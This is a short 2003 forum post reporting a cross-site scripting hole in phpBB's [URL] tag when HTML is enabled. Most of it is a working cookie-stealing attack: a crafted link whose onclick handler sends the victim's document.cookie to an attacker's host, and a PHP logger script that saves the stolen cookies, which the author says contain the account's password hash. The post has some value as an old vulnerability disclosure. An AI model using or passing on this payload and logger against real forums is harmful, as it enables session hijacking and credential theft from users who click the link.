EvilGod
Sep 13 2003, 11:13 AM
Sorry in advance for my bad english but I'm italian
Ok.. I installed the latest phpBB release on my own system and tried this out: it works.
If the phpBB HTML option is "ON" you can execute javascripts using the [URL] tag.
We can use this vulnerability for cookie stealing.
EXAMPLE:> Create a new post and insert a link in this way:| CODE |
[url=http://www.google.it" onclick="window.location='http://your.phpsite.com/log.php?'+document.cookie"]Link_text[/url]
|
"log.php" will write into a text file the cookie of the user who clicks on this link.
--- EXAMPLE OF LOG.PHP ---
| CODE |
<?
$fd = fopen("cookie.txt", "a+") or die("can`t open file!");
$fout = fwrite($fd, "$QUERY_STRING\n");
fclose($fd);
?>
|
--- END OF LOG.PHP ---
In the cookie file we will find the encrypted (md5 i think) password of the phpBB account.
